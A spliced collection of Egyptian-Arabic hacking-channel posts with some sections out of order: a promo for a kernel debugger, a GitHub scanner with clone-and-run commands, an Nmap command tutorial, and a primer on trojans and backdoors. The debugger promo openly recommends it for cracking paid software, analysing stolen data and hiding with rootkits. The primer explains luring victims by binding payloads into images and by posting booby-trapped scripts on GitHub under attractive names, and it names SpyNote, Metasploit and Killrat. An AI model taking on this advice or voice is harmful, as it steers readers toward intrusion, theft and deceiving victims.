كمان البرنامج فيه Hex-based Expression Parser، وده بيخلّيك تقدر تبحث في الذاكرة وتستخرج أي بيانات أو عناوين بسهولة، سواء كنت بتدور على حاجة معينة أو بتحلل حاجة شغّالة. غير كده، البرنامج بيديك خريطة للذاكرة وبيوريك كل الوحدات النمطية والخيوط اللي شغالة، وده بيفيد جدًا في فهم كل التفاصيل اللي بتحصل في النظام. ميزة تعديل الرجسترات كمان رهيبة، لأنك بتقدر تتحكم في العمليات اللي شغالة بشكل مباشر.
البرنامج بيتميز بإنه بيخلّيك تشتغل على الـ I/O ports، يعني تقرأ وتكتب بيانات على مستوى الأجهزة الفيزيائية، زي الذاكرة أو الكروت اللي متوصلة بالجهاز، وده بيديك قدرة تلاعب مش طبيعية. كمان فيه أداة Fast Assembler/Disassembler باستخدام Zydis 4.0.0، واللي بتخليك تفك كود أي برنامج أو عملية شغالة وتعدل عليه وترجّعه شغال تاني، ودي ميزة هتساعدك جدًا في الكراك وفك حماية البرامج والألعاب المدفوعة.
البرنامج كمان بيدعم الإضافات، يعني ممكن تعمل Plugins تخلي البرنامج يخدم احتياجاتك بشكل أكبر، وده بيضيف ليه مرونة رهيبة. غير كده، فيه حاجة اسمها نظام استعراض الهياكل، زي العمليات اللي شغالة، تعريفات النظام، البيوس، الـ ACPI، وحتى العمليات اللي بتحصل في الكيرنل، وده بيدي صورة كاملة لأي هاكر عاوز يفهم النظام كويس أو يكتشف ثغرات.
أكتر حاجة هايلة فيه هي إنك تقدر تصحح الكيرنل أو العمليات اللي شغالة من غير ما تحتاج تشغل الـ Debug Mode بتاع ويندوز أو تفعل الـ Global Debug Flag، ودي ميزة خطيرة جدًا لأي بلاك هات عشان يشتغل من غير ما يتكشف بسهولة. لو عاوز تطور البرنامج، ممكن تفكر تدمجه مع أدوات تحليل قواعد بيانات عشان تقدر تحلل بيانات مسروقة، أو تطور إضافات تخليك تتفاعل مع أنظمة السحابة أو الأجهزة المتوصلة بالجهاز زي كروت الشاشة والهاردات.
البرنامج كمان بيخلّيك تعدّل على الملفات الثنائية مباشرة، يعني لو عاوز تعمل باتش أو تعديلات على برنامج معين وتوزعها، ده سهل جدًا. ولو بتفك تشفير حاجة، تقدر تستغل الذاكرة عشان تستخرج مفاتيح التشفير أو تحلل أنظمة الحماية في البرامج وتفكّها. ممكن كمان تدمجه مع Rootkits عشان تضمن إن شغلك كله مخفي وماحدش يكتشفه.
باختصار، CM64 Pro أداة جبارة لأي هاكر محترف. بتديك سيطرة كاملة على النظام وتفتح أبواب جديدة لأي حد شغال في البلاك هات. لو طورتها بدماغ شغالة، هتلاقي نفسك ماسك سلاح يديك قوة رهيبة في الاختراق وتحليل أي نظام.
رابط الأداة الاسطورية
🟦🟦🟦🟦🟦🟦🟦
الاداه الجديده نزلت ع github ↔️
فايده الاداه:
1- فحص الموقع من الثغرات المشهوره مثل sql و xss وغيرهم
2- فحص DDOS التاثير ع الموقع ناجح ام فاشل
3- فحص ملفات للموقع مصرح بها او غير يجب اغلقها لعدم
استغللها من قبل الهاك
4- فحص بورتات مفتوحه ولو لها اصدار يطلع اصدرها ولو لها استغلال exploit يطلع مربوطه ب nmap معا بعض التطوير
5- فحص زمن الاستجابه Dos + عدد روابط داخله وخارجيه
🟦🟦🟦🟦🟦🟦🟦
تنزيل الاداه تدعم (Termux& kali linux& Windows& Linux )
(Bash)
git clone https://github.com/MohamedAbuAl-Saud/SCANNER-DF
cd SCANNER-DF
chmod +x SCANNER-DF.sh
bash SCANNER-DF.sh
🟦🟦🟦🟦🟦
By||@A_Y_TR⭐️
🟦🟦🟦🟦🟦
🟦🟦
DF🥷
🟦🟦
وبس والله😊مثال:
nmap --top-ports 20 192.168.1.1ده هيعرض المنافذ الشائعة فقط على الجهاز 192.168.1.1. 8. فحص كل المنافذ: لو حابب تفحص كل المنافذ من 1 لـ 65535 على جهاز ما، استخدم:
nmap -p- <IP>شرح: ده هيقوم بفحص كل المنافذ من 1 لـ 65535. بيكون أبطأ من الفحص على المنافذ المحددة لكن بيديك فحص شامل لكل المنافذ. مثال:
nmap -p- 192.168.1.1
ده هيقوم بفحص كل المنافذ على الجهاز.
9. حفظ النتائج في ملف:
لو حابب تحفظ نتائج الفحص في ملف علشان تراجعها بعدين، استخدم:
nmap -oN DF.txt <IP>
شرح:
ده هيسمح لك بحفظ النتائج في ملف نصي.
ده مفيد لو حابب تشارك النتائج أو تراجعها لاحقًا.
مثال:
nmap -oN DF.txt 192.168.1.1
ده هيحفظ كل نتائج الفحص في ملف نصي اسمه DF.txt
10. فحص الثغرات باستخدام السكربتات (Script Scanning):
Nmap بتيجي مع سكربتات جاهزة بتساعدك تكشف عن ثغرات معروفة في الخدمات زي HTTP أو FTP أو غيرهم.
nmap --script <script_name> <IP>
شرح:
هنا تقدر تستخدم سكربتات معينة تبحث عن ثغرات معروفة، زي سكربتات Nmap Scripting Engine (NSE).
Nmap فيها مجموعة كبيرة من السكربتات الجاهزة لكل أنواع الخدمات، واللي بتساعدك تكتشف الثغرات بسرعة.
مثال:
nmap --script=http-vuln-cve2015-1635 192.168.1.1
ده هيستخدم سكربت معين للكشف عن ثغرة معروفة في خدمة HTTP.
11. اكتشاف الأجهزة المتصلة بالشبكة (Ping Sweep):
لو حابب تكتشف الأجهزة المتصلة في الشبكة من غير فحص المنافذ، استخدم:
nmap -sn <IP range>شرح: ده بيعمل Ping لكل الأجهزة في النطاق المحدد من غير ما يفحص المنافذ. ده مفيد لو حابب تكتشف الأجهزة المتصلة في الشبكة. مثال:
nmap -sn 192.168.1.0/24
ده هيعمل Ping لكل الأجهزة المتصلة على الشبكة من 192.168.1.1 لـ 192.168.1.255.
الملخص:
كل الأوامر دي هتساعدك تكتشف وتفحص الأجهزة والشبكات اللي حواليك
تقدر تبدأ بأوامر بسيطة زي
nmap <IP>وبعد كده تتعمق في الأوامر الأكثر تعقيدًا زي الفحص الخفي، أو استخدام السكربتات لاكتشاف الثغرات. استخدام Nmap هيكون مفيد جدًا في اختبار أمان الشبكات. هتنزل كزرسات nmap دلوقتي واتمنا تكونو أستفدتو ♥ وبس والله 😊
شرح لي Nmap
اي يا عم زعيم عمل تقولي ن ماب ن ماب في ايه وضحلي كدا ايه الأداه دي؟
حاضر يا سيدي أسمع:
أداة Nmap (Network Mapper) هي واحدة من أقوى الأدوات المستخدمة في مجال اختبار الأمن السيبراني
اكتشاف الشبكات وفحص الثغرات.
نقدر من خلالها نكتشف الأجهزة المتصلة بالشبكة نعرف الخدمات اللي شغالة على المنافذ وكمان نكتشف نظام التشغيل اللي بيشغل الجهاز المستهدف.
هشرح أوامر Nmap بلتفاصيل تابع
أداة Nmap:
Nmap هي أداة مفتوحة المصدر تستخدم لاكتشاف الأجهزة المتصلة بشبكة معينه
فحص المنافذ المفتوحة على الأجهزة والتحقق من الخدمات اللي شغالة عليها.
بتستخدم في اختبار أمان الشبكات وأجهزة السيرفرات
وعشان تكتشف الثغرات الموجودة في الأنظمة.
جميل طيب ازاي استخدمها وانزلها يا عم زعيم انزله ع kali kinux ولا انظمه للينكس ولا ايه؟
حاضر يا سيدي هقولك ازاي تنزلها وتستخدمها واومرها كمان تابع معيا
1. تثبيت Nmap على Termux:
لو أنت بتستخدم Termux على موبايل أندرويد وعاوز تشغلها تابع
أولًا قم بتحديث الحزم
pkg update && pkg upgrade
ثم قم بتثبيت Nmap:
pkg install nmap
لتتأكد من التثبيت، اكتب:
nmap --version
على Kali Linux:
لو أنت على Kali Linux، افتح الـ Terminal واكتب:
لتحديث الحزم:
sudo apt update && sudo apt upgrade
لتثبيت Nmap (لو مش مثبت):
sudo apt install nmap
لتتأكد من التثبيت:
nmap --version
جميل ثبتناها ازاي نستخدمها يا زعيم؟
حاضر تابع
اوامر Nmap الاكثر شائعه مشهوره ومستخدمه كثير
1. فحص جهاز معين (IP):
لو حابب تفحص جهاز معين لمعرفة المنافذ المفتوحة عليه أو حالته بشكل عام
nmap <IP>شرح: بتحط مكان <IP> عنوان الـ IP للجهاز أو السيرفر اللي حابب تفحصه. الأمر ده بيعرض لك المنافذ المفتوحة على الجهاز وفي بعض الأحيان بيدي تفاصيل عن النظام والخدمات اللي شغالة على المنافذ. مثال:
nmap 192.168.1.1ده هيعرض المنافذ المفتوحة على الجهاز اللي عنوانه 192.168.1.1 2. فحص مجموعة من الأجهزة: لو عاوز تفحص أكتر من جهاز في نفس الوقت استخدم النطاق ده
nmap 192.168.1.1-10شرح: الفحص هيتم للأجهزة من 192.168.1.1 لحد 192.168.1.10. ده مفيد لو عاوز تفحص مجموعة من الأجهزة بنفس الوقت. مثال:
nmap 192.168.1.1-10ده هيعرض لك المنافذ المفتوحة على الأجهزة من .1 لـ .10. 3. فحص شبكة كاملة (Subnet): لو عاوز تفحص كل الأجهزة المتصلة في شبكة معينة، استخدم:
nmap 192.168.1.0/24شرح: هنا بتحدد الـ Subnet الخاصة بالشبكة. بتقوم بفحص كل الأجهزة في نفس الشبكة الفرعية 192.168.1.0، وده هيراعي كل الأجهزة من 192.168.1.1 لحد 192.168.1.255. مثال:
nmap 192.168.1.0/24ده هيعرض لك كل الأجهزة المتصلة على الشبكة دي. 4. عرض تفاصيل الخدمة والإصدار (Service Version Detection): لو عاوز تعرف تفاصيل أكثر عن الخدمات والإصدارات التي تعمل على المنافذ المفتوحة استخدم:
nmap -sV <IP>شرح: الأمر ده بيديك معلومات عن نوع الخدمة اللي شغالة على كل منفذ، وكمان الإصدار الخاص بالخدمة دي. ده بيساعد في تحديد إذا كان فيه أي ثغرات معروفة في الإصدارات دي. مثال:
nmap -sV 192.168.1.1
ده هيعرض لك إصدارات الخدمات اللي شغالة على المنافذ المفتوحة على الجهاز 192.168.1.1.
5. اكتشاف نظام التشغيل (OS Detection):
لو حابب تكتشف نظام التشغيل اللي شغال على الجهاز المستهدف، استخدم:
nmap -O <IP>
شرح:
الأمر ده بيحاول يكتشف نوع النظام على الجهاز.
لو الجهاز متاح ومفيش حماية قوية
Nmap هيحاول يخمن نوع النظام باستخدام تقنيات خاصة.
مثال:
nmap -O 192.168.1.1
ده هيكتشف نوع النظام اللي شغال على الجهاز اللي عنوانه 192.168.1.1، سواء كان Windows، Linux أو macOS.
6. الفحص الخفي (SYN Scan):
لو عاوز تعمل فحص خفي علشان المنافذ المفتوحة من غير ما يتكشف جهازك استخدم:
nmap -sS <IP>شرح: ده بيستخدم SYN Scan وده فحص خفي بيسمح لك بتحديد المنافذ المفتوحة من غير ما الجهاز المستهدف يعرف. الـ SYN Scan بيتم عن طريق إرسال طلب SYN فقط لو تم الرد بـ SYN/ACK ده معناه إن المنفذ مفتوح. مثال:
nmap -sS 192.168.1.1
ده هيعمل فحص SYN على المنافذ المفتوحة في الجهاز 192.168.1.1 دون أن يتم الكشف عن جهازك.
7. فحص المنافذ الشائعة فقط:
لو مش عاوز تضيع وقتك في فحص كل المنافذ وعاوز تركز على أهم المنافذ، استخدم:
nmap --top-ports 20 <IP>شرح: الأمر ده بيفحص أكتر المنافذ الشائعة (أو الأكثر استخدامًا) فقط. لو حابب تفحص أكتر من 20 بورت ممكن تغير الرقم 20 لأي عدد تاني.
ماهو البايلود : باختصار هو السيرفر الذي يتصل بينك وبين الظحية لتوصيل معلومات الضحية اليك عنطريق البورتات والاتصال العكسي وايضا له عدة اسماء منها تروجان سيرفر ، باكدور ، بايلود ، فايروس كلها شيء واحد
يقسم البايلود الى اقسام رئيسية
1- بايلودات انظمة : هذا القسم يقسم الى قسمين رئيسيين
1- بايلود للهواتف : هذا البايلود هو على شكل تطبيق للهواتف apk في حال اي شخص يقوم بتثبيته ويفتحه يتم اختراقه بشكل كامل والتوصل لكل حساباته وصوره وملفات وطبعا بقية البايلودات ايضا توصل لكل شيء لكن هذا البايلود مزعج حيث لايمكنك ان تقنع الهكر بان يثبته لتخترقه ولايمكنك ان تجعله على شكل صورة او فيديو حيث صعب الاختراق به
2- سيرفر للحواسيب : وهو سيرفر برنامج للحاسوب لكن يتم اختراق اي شخص يفتحه على حاسوبه وايضا يتميز هذا السيرفر بانه يمكنك دمجه بصورة او اي ملف مثلا فيديو او اي شيء ويصبح على شكل الملف الذي دمجته معه واي شخص يفتحه يتم اختراق حاسوبه .
3- بايلودات لغات برمجية : وفي هذه البايلودات تكون على شكل سكربت مبرمج بلغة برمجية مثلا python او perl او لغات اخرى بمجرد ان الشخص يقوم بتشغيل هذا السكربت بتيرموكس يتم اختراقه وهو متقدم لانه يمكنك رفع هذا السكربت على موقع github حيث ينتجلك رابط لتحمل السكربت وتضع له اسم جذاب ليجذب الاشخاص اليه وعندما يثبتون الاداة ويشغلون السكربت يتم اختراقهم
3- بايلودات متقدمة : وفي هذه البايلودات نقصد مثلا رابط اذا قام اي شخص بفتحه تخترق جهازه بلكامل وليس فقط رابط هناك بايلود لفيديو بحيث اي شخص يقوم بتشغيل الفيديو تخترق هاتفه او بايلود اغنية اي شخص يشغلها تخترق هاتفه او بايلود صورة وهكذا
-الادوات التي تقوم بهذه البايلودات :
1- بايلود للهواتف :
برنامج SpyNote او ادات Metasploit
2- بايلود للحواسيب :
اداة Metasploit او برنامج Killrat
3- البايلودات البرمجية :
اداة venom وايضا Metasploit
4- البايلودات المتقدمة :
اداة Metasploit او بعض الادوات المدفوعة
لااشجع سوا استخدام ادوات مشهورة وامنة مثل ميتاسبلويت او ارميتاج وانظمة مثل كالي لينكس
وبس والله 😊
